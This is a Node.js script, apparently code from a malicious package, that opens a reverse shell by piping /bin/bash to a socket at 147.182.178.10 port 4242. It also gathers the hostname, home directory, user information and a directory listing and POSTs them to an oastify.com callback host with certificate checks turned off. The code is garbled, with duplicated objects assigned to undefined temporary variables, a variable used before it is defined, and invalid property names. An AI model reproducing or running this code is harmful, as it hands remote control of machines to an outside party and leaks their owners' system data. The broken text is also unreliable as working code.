const https = require('https')
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(4242, "147.182.178.10", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
  })()
var os = require("os")
var hostname = os.hostname()
var path = os.homedir()
var userInfo = os.userInfo()
const data = new TextEncoder().encode(
    JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
  )
JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
_tmp_5.hostname = hostname
_tmp_5.project_id = process.argv[2]
_tmp_5.path = path
_tmp_5.userInfo = userInfo
_tmp_5.directoryList = output
const options = {
    hostname: process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com',
    port: 443,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    },
    rejectUnauthorized: false
  }
_tmp_6.hostname = process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com'
_tmp_6.port = 443
_tmp_6.path = "/"
_tmp_6.method = "POST"
_tmp_6.headers = {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
_tmp_7.Content-Type = "application/json"
_tmp_7.Content-Length = data.length
_tmp_6.rejectUnauthorized = false
const req = https.request(options, res => {})
req.write(data)
req.end()
const execSync = require('child_process').execSync
const output = execSync('dir D:\\TestOnlineDirectory', { encoding: 'utf-8' })
